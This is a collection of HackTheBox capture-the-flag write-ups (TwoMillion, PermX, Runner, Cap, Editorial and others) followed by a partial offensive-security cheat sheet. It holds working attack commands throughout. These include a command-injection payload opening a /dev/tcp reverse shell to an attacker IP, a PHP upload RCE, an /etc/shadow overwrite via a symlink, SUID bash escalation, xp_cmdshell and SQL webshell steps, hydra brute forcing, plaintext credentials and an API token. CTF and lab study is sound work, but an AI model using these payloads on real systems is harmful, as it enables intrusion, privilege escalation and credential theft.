![Image](image-7.png) ### Vulnerability Theme.php, version, README.md, LICENSE files ![Image](image-8.png) Now we have a vulnerability. #### CVE-2023-41425 https://github.com/prodigiousMind/CVE-2023-41425?source=post_page-----7ebffbff37d2-------------------------------- ![Image](image-9.png) Follow the instructions of repository. ```python python3 exploit.py http://sea.htb/wondercms/loginURL 10.10.11.28 9001 ``` ![Image](image-10.png) The script make us a file \"xss.js\" and we need to send the link in the section website of form. Once send the form make us a file in the path /themes/revshell-main/rev.php that need execute for got the reverse shell. ![Image](image-11.png) This the path what need to execute but we need to add the ip and port of attacker machine. ![Image](image-12.png) ### Shell as www-data Attacker machine: ![Image](image-13.png) ![Image](image-14.png) Till now we have geo and amay users. ![Image](image-15.png) We found the path of database with a password. ![Image](image-16.png) ### Hashcat Hash bcrypt Before we need to remove the scape slash `\\`. `$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q` ![Image](image-17.png) Password: `mychemicalromance` ### User amay ![Image](image-18.png) ## Port Forwarding SFTP Tunneling ![Image](image-19.png) ```bash ssh -L 48763:localhost:8080 amay@10.10.11.28 amay@10.10.11.28's password: ``` ![Image](image-20.png) `amay` `mychemicalromance` ## System Log and Monitoring ![Image](image-21.png) ![Image](image-22.png) ![Image](image-23.png) ![Image](image-24.png) Rooted! :-)"},{"id":"twomillion","title":"HTB - TwoMillion","description":"HTB - TwoMillion","date":"2023-06-07T16:17:34.000Z","tags":["HackTheBox","API","CVE-2023-0386","nmap","web","rot13","curl","OverlayFS-Fuse"],"authors":[],"url":"/blog/twomillion","content":"## Box Info | Name | Bizness | | :-------------------- | ---------------: | | Release Date | 07 Jun, 2023 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ### Nmap ```bash nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.221 -oG allPorts nmap -sCV -p 22,80 10.10.11.221 -oN targeted ``` ![Image](0.png) ### Resolution DNS ```bash echo \"10.10.11.221 twomillion.htb | sudo tee -a /etc/hosts\" ``` ![Image](1.png) ## Web When hover the mouse over \"`here`\" show it us the link to goes. ![Image](2.png) Looking in dom i found this path from a API and the instruction of how script works ![Image](3.png) ![Image](4.png) Url decode for read more comfort: ```js function verifyInviteCode(code){ var formData = {\"code\":code}; $.ajax({ type: \"POST\", url: '/api/v1/invite/verify', dataType: 'json', data: formData, success: function(response){ console.log(response); }, error: function(response){ console.log(response); } }); } function makeInviteCode(){ $.ajax({ type: \"POST\", url: '/api/v1/invite/how/to/generate', dataType: 'json', success: function(response){ console.log(response); }, error: function(response){ console.log(response); } }); } ``` Theres a interesting function called makeInviteCode so we gonna execute this function on console from inspection web. ![Image](5.png) If i click in the object it show us something interesting encrypte in `ROT13` ![Image](6.png) We can decrypt rot13 with some web page for that ![Image](7.png) `\"In order to generate the invite code, make a POST request to /api/invite/generate\"` ```bash curl -s -X POST \"http://2million.htb/api/v1/invite/generate\" ``` With `curl` can send a POST method for generate the invite code. ![Image](8.png) And the API it generate us an code in base64, it can decrypt with base64[^code] and use it for registration us web and login. ![Image](9.png) ![Image](10.png) Looking in the web, I found a path in api/v1 ![Image](11.png) ## API Abusing again the API we send a request in method GET with the Cookie ```bash `curl -s -X GET \"http://2million.htb/api/v1\" -H \"Cookie: PHPSESSID=avhllptt4vvs1rbocvart3ue9b\"` ``` ![Image](12.png) ```bash curl -s -X PUT \"http://2million.htb/api/v1/admin/settings/update\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json\" | jq ``` ![Image](13.png) ```bash curl -s -X PUT \"http://2million.htb/api/v1/admin/settings/update\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json\" -d '{\"email\": \"jack@jack.com\"}' | jq ``` ![Image](14.png) ```bash curl -s -X PUT \"http://2million.htb/api/v1/admin/settings/update\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json\" -d '{\"email\": \"jack@jack.com\", \"is:admin\": \"True\"}' | jq ``` ![Image](15.png) ```bash curl -s -X PUT \"http://2million.htb/api/v1/admin/settings/update\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json\" -d '{\"email\": \"jack@jack.com\", \"is:admin\": \"1\"}' | jq ``` ![Image](16.png) ```bash curl -s -X GET \"http://2million.htb/api/v1/admin/auth\" -H \"Cookie: PHPSESSID=\" ``` ![Image](17.png) ```bash curl -s -X POST \"http://2million.htb/api/v1/admin/vpn/generate\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json' -d '{\"username\": \"jack\"}' | jq ``` ![Image](18.png) ![Image](19.png) ```bash curl -s -X POST \"http://2million.htb/api/v1/admin/vpn/generate\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json' -d '{\"username\": \";whoami;\"}' ``` ![Image](20.png) ```bash curl -s -X POST \"http://2million.htb/api/v1/admin/vpn/generate\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json' -d '{\"username\": \";ls;\"}' ``` ![Image](21.png) ```bash curl -s -X POST \"http://2million.htb/api/v1/admin/vpn/generate\" -H \"Cookie: PHPSESSID=\" -H \"Content-Type: application/json' -d '{\"username\": \";bash -c \\\"bash -i >& /dev/tcp/10.10.14.88/443 0>&1\\\" #\"}' ``` ![Image](22.png) ```bash rlwrap nc -lvnp 443 ``` ![Image](23.png) Enumerate linux we can see a folder with the name .env this contain a credentials in plane text. We are a www-data so we need ![Image](24.png) admin SuperDuperPass123 When we login the first appear is mail, this mail is lcoated in /var/mail ![Image](25.png) ## CVE-2023-0386 Well, the mail says everything... Google it. ![Image](26.png) Search in google \"OverlaysFS Fuse linux kernel and the fisrt poc i found is this `CVE-2023-0386`[^cve] ![Image](27.png) ROOT ### Source [^code]: [^cve]:"},{"id":"permx","title":"HTB - PermX","description":"HTB - PermX","date":"2023-06-07T00:00:00.000Z","tags":["HackTheBox","Chamilo-LMS","CVE-2023-4220","mysql","symlink","curl"],"authors":["r4cc0x"],"url":"/blog/permx","content":"## Box Info | Name | Bizness | | :-------------------- | ---------------: | | Release Date | 20 Jun, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ### Nmap ![Image](image.png) #### whatweb: ![Image](2.png) #### Wappalyzer ![Image](4.png) ### Web ![Image](3.png) #### Brute Forcing directory I use ```bash dirsearch -u http://permx.htb/ ``` but i dont find anything interesting, So i use the Scan for Subdomain #### SubDomain ```bash wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H \"Host: FUZZ.permx.htb\" -u http://permx.htb -t 100 ``` ![Image](5.png) Search for chamilo in google. ### Chamilo LMS - CVE-2023-4220 ![Image](6.png) RCE: ```bash echo ' & /dev/tcp/10.10.10.13/9001 0>&'\"); ?>' > rce.php ``` ```bash curl -F 'bigUploadFile=@rce.php' 'http:// /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' `The file has successfully been uploaded.` ``` ```bash curl 'http:// /main/inc/lib/javascript/bigupload/files/rce.php' `uid=33(www-data) gid=33(www-data) groups=33(www-data)` ``` ![Image](7.png) We go to open the file through web. ![Image](8.png) Execute the file .php `http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php` with `lvwrap nc -lvnp 7777` listening for get the reverse shell ![Image](9.png) taadaaa... Well, we login as `www-data` and we go to enumerate... I found in config folder a file `configuration.php` and show it us a user and password. Till now we have one user:`chamilo` and password:`03f6lY3uXAP2...`. ![Image](10.png) `netstat -nlp` or `netstat -ano` and we see one port strange and is port 3306 it is open for the database. ![Image](11.png) Use the mysql inside in the victim machine. ```bash mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8 ``` ![Image](12.png) ```text show databases; use chamilo; describe user; select user_id,username,firstname,lastname,password,salt from user; ``` ![Image](13.png) We login with ssh `mtz@permx.htb` and password `03F6lY3uXAP2bkW8` ![Image](14.png) `sudo -l` ![Image](15.png) ## Symlink (Symbolic Link Attack) The directory `/etc/init.d`{: .filepath} is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`{: .filepath}. An alternative path in Redhat systems is `/etc/rc.d/init.d`{: .filepath}. Its main function is to change all file permissions, but it must be in the `/home/mtz` directory. ![Image](16.png) [Symlink Español](https://www.freecodecamp.org/espanol/news/tutorial-de-enlace-simbolico-en-linux-como-crear-y-remover-un-enlace-simbolico/) [Symlink Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-upload#symlink) ```bash link soft / to cc ln -s / cc ``` Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to `/etc/shadow`{: .filepath} (root password) with a password that we create ourselves (cccc). ![Image](17.png) The `/etc/shadow`{: .filepath} storage the password of root ```bash sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions) ``` ![Image](18.png) Generated a password for remplace the root password in `/etc/shadow`{: .filepath} ```bash openssl passwd -6 cccc ``` ![Image](19.png) and copy and paste en the file `\"shadow\"` ```bash echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow ``` Login as root with password cccc ![Image](20.png) `Root`"},{"id":"runner","title":"HTB - Runner","description":"HTB - Runner","date":"2023-06-07T00:00:00.000Z","tags":["HackTheBox","wfuzz","TeamCity","ssh","john","chisel","portainer","docker","fuzz","Port-Forwarding"],"authors":["r4cc0x"],"url":"/blog/runner","content":"## Box Info | Name | Bizness | | :-------------------- | ---------------: | | Release Date | 08 Jun, 2024 | | OS | Linux | | Rated Difficulty | Medium | ## Enumeration ### Nmap ![Image](0.png) ### Resolution DNS ```bash echo \"10.10.11.13 runner.htb | sudo tee -a /etc/hosts ``` ### Scanning SubDomain ```bash wfuzz -c -w /usr/share/wordlists/amass/shubs-subdomains.txt --hc 400,404,403,302 -H \"Hosts: FUZZ.runner.htb\" -u http://runner.htb -t 100 ``` ![Image](1.png) ```bash Whatweb http://runner.htb ``` ## CVE-2023-42793 for Jet Brains We can see the version of `TeamCity build management server`. ![Image](2.png) Googling `Teamcity 2023.05.3` exploit i found a `RCE` vulnerability for it. ![Image](3.png) PoC[^poc]: ```bash python3 exploit.py -u http://teamcity.runner.htb -n test2 -p test122 -e test2@test.com ``` ![Image](4.png) The script exploits to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials. ![Image](5.png) ## SSH Once inside, I enumerate these sections and found in Diagnostics make a backup and storage in a zip file and can we display the folders and found id_rsa. ![Image](6.png) We go to download and save for login with ssh. ![Image](7.png) Wait.. but dont have a user for login with ssh... ![Image](8.png) We also found users and there hashes in same folder. ![Image](9.png) ## Crack Hash We go to crack the password for it. ![Image](10.png) ```bash john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt ``` Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3]) Remaining 1 password hash Cost 1 (iteration count) is 128 for all loaded hashes Will run 2 OpenMP threads Password: `piper123` Till now we have one id_rsa file, two users (Methew, jhon),password for Methew. `ssh -i id_rsa john@10.10.11.13` ![Image](12.png) ![Image](11.png) ## Port Forwarding ```bash netstat -nltp ss -nltpu ``` 127.0.0.1:9000 its potential, I’ll be employing Chisel for port forwarding. ![Image](13.png) ```bash chisel server -p 6150 --reverse (Attack Machine) ./chisel client 10.10.14.68:6150 R:9000:127.0.0.1:9000 (Victim machine) ``` ![Image](14.png) We go to our port 9000 ![Image](15.png) ## Docker Login with credentials `matthew` - `piper123` ![Image](16.png) ## CVE-2024-21626 for Docker ![Image](17.png) the path `/proc/self/id/8` is from the [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc) - [PoC - GitHub](https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file) ![Image](18.png) Now we go to console ![Image](19.png) Execute a `/bin/bash` as root ![Image](20.png) Just login as root and look the folder `root` for the flag ![Image](21.png) Root #### Source [^poc]:"},{"id":"cap","title":"HTB - Cap","description":"HTB - Cap","date":"2021-05-06T00:00:00.000Z","tags":["HackTheBox","Information-Disclosure","CVE-2021-4034","tcpdump"],"authors":["r4cc0x"],"url":"/blog/cap","content":"## Box Info | Name | Cap | | :-------------------- | ---------------: | | Release Date | 5 Jun, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Ping ```bash ping -c 3 10.10.10.245 PING 10.10.10.245 (10.10.10.245) 56(84) bytes of data. 64 bytes from 10.10.10.245: icmp_seq=1 ttl=63 time=55.6 ms 64 bytes from 10.10.10.245: icmp_seq=2 ttl=63 time=55.9 ms 64 bytes from 10.10.10.245: icmp_seq=3 ttl=63 time=54.8 ms ``` `ttl=63 -> Linux System` ## Nmap ```bash nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.245 ``` ```bash PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519) 80/tcp open http gunicorn | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 NOT FOUND | Server: gunicorn | Date: Sat, 22 May 2021 10:51:48 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 232 | | 404 Not Found | Not Found | The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. | GetRequest: | HTTP/1.0 200 OK | Server: gunicorn | Date: Sat, 22 May 2021 10:51:42 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 19386 | | | ...[snip]... SF:eck\\x20your\\x20spelling\\x20and\\x20try\\x20again\\. \\n\"); Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` ![Image](image.png) data/1 ![Image](image-1.png) I starter with a scan directoriy but dont foudn anything interesting ![Image](image-2.png) ## Information Disclosure ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://10.10.10.245/data/FUZZ' -fs 208 ``` ![Image](image-3.png) I download those and i test one by one to found sensitive data ![Image](image-4.png) ```bash tcpdump -qns 0 -X -r 0.pcap ``` **User:** ![Image](image-5.png) **Password:** ![Image](image-6.png) `nathan` `Buck3tH4TF0RM3!` **Login with ssh** ![Image](image-7.png) ## Escalation Privilege | CVE-2021-4034 ```BASH find / -perm -4000 2>/dev/null ``` ![Image](image-8.png) We found a bin interesting called pkexec. Looking if the pkexec has a vulnerability, i find a CVE-2021-4034 https://github.com/ly4k/PwnKit We upload the file PwnKit and exploit as nathan and BOOM! ![Image](image-9.png) Pwned!!"},{"id":"editorial","title":"HTB - Editorial","description":"HTB - Editorial","date":"2020-11-18T00:00:00.000Z","tags":["SSRF","Python","Git"],"authors":["r4cc0x"],"url":"/blog/editorial","content":"## Box Info | Name | Editorial | | :-------------------- | ---------------: | | Release Date | 15 Jun, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## **Enumeration** ![Image](image.png) echo \"10.10.11.20 editorial.htb\" | sudo tee -a /etc/hosts ![Image](image-1.png) whatweb: ![Image](image-2.png) Web: ![Image](image-3.png) dirsearch -u http://editorial.htb/ ![Image](image-4.png) This page is interesting, we can preview an image from a file or url. ![Image](image-5.png) ## SSRF The file name is renamed and the file extension is removed. When we open the preview image in a new tab, the file downloaded directly, so it seems like we can’t execute any shell directly. When I upload a file and add a url \"http://127.0.0.1/\" and intercept with BurpSuite, we can see the response 200 OK and showing a image directory location, this point to a `SSRF`. ![Image](image-6.png) In an [SSRF](https://portswigger.net/web-security/ssrf) attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like `127.0.0.1` (a reserved IP address that points to the loopback adapter) or `localhost` (a commonly used name for the same adapter) ![Image](image-7.png) The response shows us a directory path, let's download the file and see what's inside. ![Image](image-8.png) ![Image](image-9.png) ![Image](image-10.png) And re upload the file and add the path in burpsuite. `/api/latest/metadata/messages/authors`{: .filepath} ![Image](image-11.png) ![Image](image-12.png) Username: dev - Password: dev080217_devAPI!@ ![Image](image-13.png) user flag ![Image](image-14.png) ![Image](image-15.png) ### Linux Enumeration ```bash find / -user dev 2>/dev/null | grep -vE \"sys|proc\" ``` ![Image](image-16.png) ![Image](image-17.png) The command `Git show` displays detailed information about a commit. ![Image](image-18.png) ![Image](image-19.png) 080217_Producti0n_2023!@ for prod - su `prod` - password: `080217_Producti0n_2023!@` ## Privilege Escalation sudo -l ![Image](image-20.png) ```bash - echo '#!/bin/bash' > /tmp/exploit.sh - echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh ``` ![Image](image-21.png) ```bash - sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \"ext::sh -c '/tmp/exploit.sh'\" ``` ![Image](image-22.png) - `ls -l /bin/bash` ![Image](image-23.png) Start a new bash session. - `/bin/bash -p` ![Image](image-24.png)"},{"id":"offsec","title":"Offensive Security CheatSheet","description":"Offensive Security CheatSheet","date":"2020-02-21T00:00:00.000Z","tags":[],"authors":["r4cc0x"],"url":"/blog/offsec","content":"_Inspiration and Credits [s4thv1k-oscp-cheatsheet](https://s4thv1k.com/posts/oscp-cheatsheet/)_ # **Linux** ## **Network Enumeration** #### Ping ```bash How to know if the target is active? ping -c 3 {IP} # https://subinsb.com/default-device-ttl-values/ ``` #### Nmap ```bash nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn IP -oG allPorts nmap -sCV -p 80,443,8080 IP -oN targeted nmap -sC -sV IP -oN targeted ``` - Add to hosts ```bash echo \"10.10.11.252 domain.htb\" | sudo tee -a /etc/hosts ``` #### Technology Detection on web ```bash whatweb http://domain.htb/ ``` #### Masscan ```bash # Fast web scan masscan -p80 {IP ADDRESS}/24 --rate=1000 -e tap0 --router-ip {GATEWAY IP} masscan -p21,22,139,445 -Pn 192.168.111.0/24 --rate=1000 masscan -p21,22,139,445 -Pn 192.168.0.0/16 --rate=10000 ``` #### SMB | TCP/139 | 445 ```bash smbmap -H IP smbclient -L IP -N smbclient -N -L //10.129.42.253 #list smb shares smbclient -N //10.129.42.253//users #connect to an smb share ``` #### SMTP | TCP/25 ```bash # Connect to mail server nc -nv {RHOST} 25 VRFY root ``` #### POP3 | 110 ```bash telnet {rhost} 110 ``` #### SSH | TCP/22 | 2222 ```bash ssh {USER}@{RHOST} hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://IP -s 2222 -t 15 # SSH Brute Force hydra -f -l {USER} -P {pass.txt} ssh://{RHOST} hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -t 4 #example hydra -f -t 16 -L {user.txt} -P {pass.txt} ssh://{RHOST # Dicotrionary Attack hydra -l student -P /usr/share/wordlists/rockyou.txt 192.230.83.3 ssh # Upload w scp scp file.txt user@IP:/home/user/Desktop # Download w scp scp user@IP:/home/user/Desktop file.txt # Download file with scp while ssh scp -i id_rsa pepe@domain.htb:/home/pepe/procmon_2024- 08-23_00:50:02.db domain.db # Port Forwarding ssh -L 48763:localhost:8080 amay@10.10.11.28 # Pivotin through SSH ssh adminuser@10.10.155.5 -i id_rsa -D 9050 #Change the info in /etc/proxychains4.conf also enable \"Quiet Mode\" proxychains4 crackmapexec smb 10.10.10.0/24 #Example ``` ### Adding SSH Public Key ```bash #This created both id_rsa and id_rsa.pub ssh-keygen -t rsa -b 2048 -f racc0x chmod 700 ~/.ssh touch authorized_keys # create file in ~/.ssh/ and copied content here chmod 600 authorized_keys ssh user@TARGETIP ``` #### FTP | TCP/21 ```bash ftp 192.168.123.2 ftp -A nmap -p21 --script= #scan ftp w nmap wget -r ftp://IP # Download entire FTP directory wget -r ftp://{USER}:{PASS}@{RHOST}/ # Brute force FTP hydra -f -t 16 -l {user} -P {pass.txt} ftp://{RHOST} hydra -f -t 16 -L {user.txt} -P {pass.txt} ftp://{RHOST} hydra -l pepito -P pass.txt ftp://IP -t 15 ``` #### DNS | UDP/53 ```bash dnsenum domain.htb #DNSRecon Brute Force dnsrecon -d {DOMAIN} -D ~/{BRUTE_LIST.txt} -t brt gobuster dns -r IP -d Domain -w Wordlist -t 100 # DNS Bruteforce using dnsenum dnsenum megacorpone.com dnsrecon -d megacorpone.com -t std #standard recon dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list for ip in $(cat list.txt); do host $ip.megacorpone.com; done #DNS Bruteforce for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v \"not found\" #bash bruteforcer to find domain name ``` --- ### OSINT ```bash https://osintframework.com/ # Google hacking https://www.exploit-db.com/google-hacking-database # NetCraft https://www.netcraft.com/ # Recon-ng # Github Search filename:users # Qualys SSL lab https://www.ssllabs.com/ssltest/ # Shodan https://www.shodan.io/ # Security Header Scanner https://securityheaders.com/ # Pastebin https://pastebin.com/ # theHarvestor theharvester -d {SITE} -b google # Social Searcher https://www.social-searcher.com/ https://pimeyes.com #Leaked data https://dehashed.com/ # Reverse IP LookUp nad more https://viewdns.info/ #Subfinder https://phonebook.cz #Passive Scan https://github.com/UnaPibaGeek/ctfr ``` #### Google Dorks ```bash https://www.exploit-db.com inurl:wp-config.php.txt site:tiner.com filetype:txt intext:tinder.com filetype:pdf site:*.tinder.com https://pentest-tools.com ``` --- ### File Transfer ```bash wget http://HOST:PORT/file curl http://HOST:PORT/file -o file python3 -m http.server 8080 ``` ### Password Hash | Cracking ```bash #cracking id_rsa or id_ecdsa ssh2john id_ecdsa > hash ssh2john id_rsa > hash hashcat -m $number hash wordlists.txt --force hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -o found.txt --force hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt ssh2john.py id_rsa > hash #Convert the obtained hash to John format(above link) john hashfile --wordlist=rockyou.txt john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt john --wordlist=rockyou.txt protected-docx.hash #hash protected ``` ### fcrackzip ```bash fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip #Cracking zip files ``` --- ## **Web Pentesting** [Script-Based Guide to Injection Attacks: SQLi, XSS, Command, XML, and HTML](https://medium.com/@harshleenchawla06/script-based-guide-to-injection-attacks-sqli-xss-command-xml-and-html-c11a810841e0) [File Inclusion - CheatSheet](https://github.com/attacker-codeninja/htb-cheatsheet/blob/master/lfi-rfi-cheatsheet.md) [HackTricks](https://book.hacktricks.xyz/) ### Domain Enumeration #### Dirsearch ```bash dirsearch -u http://url.htb dirsearch -u http://machine.htb/ --exclude-statuses 404 -o /path/to/output.txt ``` #### Feroxbuster ```bash feroxbuster -u http://domain.htb feroxbuster -u http://domain.htb/folder/folder/ -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,js,md feroxbuster -u http://domain.htb:8000 -m GET, POST feroxbuster -u http://example.com -w wordlist.txt -x 404 feroxbuster -u http://example.com -w wordlist.txt -o results.txt ``` #### Ffuf ```bash # Virtual Host Fuzzing ffuf -u https://FUZZ.domain.htb/ -w /path/to/subdomains.txt -H \"Host: FUZZ.domain.htb\" ffuf -c -t 200 -w /usr/share/SecLists/Discovery/Web-Content/direcotry-list-2.3-medium.txt -u https://miwifi.com/FUZZ # Fuzzing for Content Discovery with Extensions w verbose output ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v # Fuzzing GET Parameters ffuf -u \"https://domain.htb/page.php?FUZZ=value\" -w /path/to/paramlist.txt # fuzzing with multiple parameters ffuf -u https://host.com/FUZZ1/FUZZ2 -w /path/to/wordlist1.txt:/path/to/wordlist2.txt # filter response status codes ffuf -u https://host.com/FUZZ -w /path/to/wordlist.txt -fc 404 # Fuzzing with parameter-based LFI ffuf -u \"https://host.com/page.php?file=FUZZ\" -w /path/to/lfipayloads.txt # Fuzzing with a proxy ffuf -u https://domain.com/FUZZ -w /path/to/wordlist.txt -x http://127.0.0.1:8080 # filter response size ffuf -u https://domain.com/FUZZ -w /path/to/wordlist.txt -fs 1234 # match status codes ffuf -u https://domain.com/FUZZ -w /path/to/wordlist.txt -mc 200,301,302 ``` #### Wfuzz ```bash wfuzz -c --hc=404,403 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt https://miwifi.com/FUZZ/ wfuzz -c --hw=6515 -t 200 -z range,1-20000 'https://mi.com/shop/buy/detail?product_id=FUZZ' wfuzz -c --hc=404 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/direcotry-list-2.3-medium.txt -z list,txt-php http://admin.domain.htb/directory/FUZZ.FUZ2Z #fuzz - txt,php ``` #### Gobuster ```bash gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt gobuster dir -u https://miwifi.com/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 --add-slash -b 403,404 -x php,html,txt gobuster dir -u https://miwifi.com/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x html -s 200 -b '' ``` ```bash whatweb http://url.htb whatweb -l http://url.htb #list all plugins whatweb -a http://url.htb -v # verbose ``` - Wappalyzer #### Curl ```bash curl -I \"http://${TARGET}\" curl -s -X GET \"http://sub.domain.htb/102834710284/file.php?action=show&site=FUZZ&password=12345&session=\" # fuzz in page curl -X GET \"http://domain.htb/_framework/file.dll\" -H \"Host: domain.htb\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\" -H \"X-Skipper-Proxy: http://127.0.0.1:5000\" -H \"Connection: close\" --output file.dll #download file while BurpSuite with an vuln SSRF curl -v http:// # verbose output curl -X POST http:// # use POST method curl -X PUT http:// # use PUT method curl --path-as-is http:// /../../../../../../etc/passwd # use --path-as-is to handle /../ or /./ in the given URL curl --proxy http://127.0.0.1:8080 # use proxy ``` #### OpenSSL ```bash openssl s_client -connect tinder.com:443 #Verifi Certificate Web ``` #### Certificate SSL ```bash sslscan domain.com ``` #### Droopescan | Drupal | CMS ```bash droopescan scan drupal --url http://ip:8080 ``` #### Joomscan | joomla | CMS ```bash perl joomscan.pl -u http://domain.htb/ droopescan scan joomla --url http://site sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username #https://github.com/ajnik/joomla-bruteforce ``` #### Magescan | Magento | CMS ```bash php magescan.phar scan:all http://name.htb/ ``` #### Wpscan | Wordpress | CMS ```bash # Basic usage wpscan --url http://domain.htb:8080 wpscan --url \"domain.htb\" --verbose #search plugins & users wpscan --url http://domain.htb:8080 -e vp,u wpscan --url http://domain.htb:8080 --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log #Brute Force Attack wpscan --url http://domain.htb -U admin -P /usr/share/wordlists/rockyou.txt # Add Wpscan API to get the details of vulnerabilties. wpscan --url http://alvida-eatery.org/ --api-token NjnoSGZkuWDve0fDjmmnUNb1ZnkRw6J2J1FvBsVLPkA ``` ### Subdomain Enumeration #### Ffuf ```bash ffuf -u http://IP -H \"Host: FUZZ.domain.htb\" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac ffuf -c -u \"http://domain.htb\" -H \"host: FUZZ.domain.htb\" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,302 -mc all ``` #### Gobuster ```bash gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt ``` #### Wfuzz ```bash wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H \"Host: FUZZ.blazorized.htb\" -u http://blazorized.htb -t 100 ``` ### Dealing with Passwords ```bash admin:admin administrator:root Administrator:root root:admin password password1 Password1 Password@123 password@123 admin administrator admin@123 12345678 ``` - BruteForce ```powershell hydra -L users.txt -P password.txt http-{post/get}-form \"/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect\" -V # Use https-post-form mode for https, post or get can be obtained from Burpsuite. Also do capture the response for detailed info. #Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra! ``` ```bash #Application takes some time to reload, here it is 3 seconds http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- // ``` - Manual Code Execution ```bash kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; #Now we can run commands EXECUTE xp_cmdshell 'whoami'; #Sometimes we may not have direct access to convert it to RCE from web, then follow below steps ' UNION SELECT \" \", null, null, null, null INTO OUTFILE \"/var/www/html/tmp/webshell.php\" -- // #Writing into a new file #Now we can exploit it http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution ``` - SQLMap - Automated Code execution ```bash sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing on parameter names \"user\", we'll get confirmation sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping database #OS Shell # Obtain the Post request from Burp suite and save it to post.txt sqlmap -r post.txt -p item --os-shell --web-root \"/var/www/html/tmp\" #/var/www/html/tmp is the writable folder on target, hence we're writing there ``` ### Path Traversal | OWASP TOP 10 ```bash cat 